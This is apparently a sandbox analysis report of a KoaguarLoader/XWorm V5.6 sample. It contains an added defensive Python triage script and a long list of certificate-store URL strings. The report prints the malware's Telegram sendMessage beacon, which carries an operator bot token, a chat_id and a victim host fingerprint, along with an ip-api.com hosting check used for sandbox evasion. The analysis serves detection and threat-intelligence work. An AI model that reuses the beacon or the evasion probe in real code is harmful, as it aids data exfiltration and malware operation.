                        Source: global trafficHTTP traffic detected: GET /bot7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ/sendMessage?chat_id=1099820672&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE8A88C49498A9F1316DD%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%204UM_3KAGS%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Source: unknownDNS query: name: ip-api.com
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (37 entries in the report)
                        Source: unknown | UDP traffic detected without corresponding DNS query: 172.67.191.102 (13 entries in the report)
                        Source: global traffic | HTTP traffic detected: GET /bot7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ/sendMessage?chat_id=1099820672&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE8A88C49498A9F1316DD%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%204UM_3KAGS%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                        Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                        Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                        Source: global traffic | DNS traffic detected: DNS query: develop-oregon.gl.at.ply.gg
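The two GET requests recorded above are the XWorm client's first-contact beacon (a Telegram Bot API sendMessage call that carries the operator's bot token and chat_id plus a URL-encoded host fingerprint) and the ip-api.com fields=hosting probe the sample uses to decide whether it is running in a data center. The misspellings "Clinet" and "Groub" in the beacon are the malware's own and must be kept verbatim in any signature. The Python below is an added example, not part of the Joe Sandbox report: it parses proxy-style request lines, pulls the bot token, chat_id and fingerprint fields out of a sendMessage beacon, and flags the hosting check. The request lines are constructed from the report's two HTTP entries (Host header folded into an absolute-form URL) plus one CRL URL from the report's string list as a benign control; the CRL and CA URLs listed further down (c.pki.goog, digicert.com, comodoca.com and similar) are certificate-store strings, not C2 indicators, and the triage treats them as benign.

```python
"""Triage of the HTTP beacons recorded in the KoaguarLoader sandbox run.

Added example; not part of the Joe Sandbox report. Request lines below are
constructed from the report's 'HTTP traffic detected' entries (the Host
header folded into an absolute-form URL, as a proxy log would record it).
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample input. Lines 1 and 2 reproduce the report's two GET
# requests; line 3 is a CRL URL from the report's string list, used as a
# benign control.
SAMPLE_REQUESTS = [
    "GET http://api.telegram.org/bot7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ"
    "/sendMessage?chat_id=1099820672&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0A"
    "New%20Clinet%20:%20%0D%0AE8A88C49498A9F1316DD%0D%0A%0D%0AUserName%20:%20user%0D%0A"
    "OSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0A"
    "CPU%20:%20Error%0D%0AGPU%20:%204UM_3KAGS%20%0D%0ARAM%20:%207.99%20GB%0D%0A"
    "Groub%20:%20XWorm%20V5.6 HTTP/1.1",
    "GET http://ip-api.com/line/?fields=hosting HTTP/1.1",
    "GET http://c.pki.goog/r/gsr1.crl HTTP/1.1",
]

# Telegram bot tokens have the form <numeric bot id>:<35-character secret>;
# the path segment after the token is the Bot API method (sendMessage, ...).
TELEGRAM_BOT_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]{35})/(\w+)$")


def parse_fingerprint(text):
    """Turn the XWorm 'New Client' message body into a dict.

    Lines are 'Key : Value'. The client ID follows a 'New Clinet :' line with
    an empty value, and the first line carries the family banner in brackets.
    """
    fields = {}
    pending_key = None
    for raw in text.replace("\r\n", "\n").split("\n"):
        line = raw.strip()
        if not line:
            continue
        if " : " in line or line.endswith(" :"):
            key, _, value = line.partition(" :")
            key, value = key.strip(), value.strip()
            if value:
                fields[key] = value
            else:
                pending_key = key          # value is on the next line
        elif pending_key:
            fields[pending_key] = line
            pending_key = None
        else:
            banner = re.search(r"\[(.+?)\]", line)
            if banner:
                fields["banner"] = banner.group(1)
    return fields


def triage_request(request_line):
    """Classify one HTTP request line; always returns a dict with 'verdict'."""
    parts = request_line.split()
    if len(parts) != 3:
        return {"verdict": "unparsed", "raw": request_line}
    url = urlsplit(parts[1])
    host = url.hostname or ""

    if host == "api.telegram.org":
        match = TELEGRAM_BOT_RE.match(url.path)
        if match:
            bot_id, secret, method = match.groups()
            query = parse_qs(url.query)
            result = {
                "verdict": "telegram_bot_c2",
                "bot_id": bot_id,
                "bot_token": f"{bot_id}:{secret}",   # report/revoke via Telegram
                "api_method": method,
                "chat_id": query.get("chat_id", [""])[0],
            }
            if method == "sendMessage" and "text" in query:
                result["fingerprint"] = parse_fingerprint(query["text"][0])
            return result

    # ip-api.com's 'hosting' field is what the sample uses to detect a
    # data-center / sandbox host; on its own it is only weak evidence.
    if host == "ip-api.com" and parse_qs(url.query).get("fields") == ["hosting"]:
        return {"verdict": "hosting_check", "host": host}

    return {"verdict": "benign", "host": host}


def triage_all(lines=SAMPLE_REQUESTS):
    """Run triage_request over every line and return the list of results."""
    return [triage_request(line) for line in lines]


if __name__ == "__main__":
    for verdict in triage_all():
        print(verdict)
```

The extracted bot_token and chat_id are the operator-side identifiers worth reporting to Telegram and pivoting on across other samples; the fingerprint dict gives the victim-side view (client ID, user, OS, hardware) that the operator received.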
                        Source: svhost.exe, 00000003.00000002.2138122248.000000000321F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000255C000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001CA2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl0
                        Source: HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/gsr1.crl=
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002574000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024F4000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024BE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B72000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001870000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BA7000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r4.crl0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024A6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DEE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/2DqfS24kcdI.crl
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DEE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/2DqfS24kcdI.crl$_U
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024BE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002492000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B72000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001870000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B78000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/we1/2DqfS24kcdI.crl0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crt
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002472000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002466000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C2E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C28000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C3E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BAE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 
0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crt0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B9E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DF6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BBE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B9E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DF6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crthttp://crl3.digicert.com/DigiCertGlobalRootG2.cr
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002560000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D20000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E2000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001ECE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002560000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D20000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E2000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001ECE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002516000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001C88000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002516000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001C88000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl(c)
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000274C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EF2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002560000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D18000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E2000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001ECE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: powershell.exe, 00000005.00000002.1042729977.000002B0D3699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micl
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001CB0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002542000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001C88000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018C2000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C74000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C6E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                        Source: svchost.exe, 0000000F.00000002.2135608032.000001CB6D800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001CB0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000254A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001CC2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018C2000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002472000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002466000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C2E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C28000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C3E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BAE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 
0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl0H
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crlhttp://crl4.digicert.com/DigiCertG
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B9E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DF6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BBE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 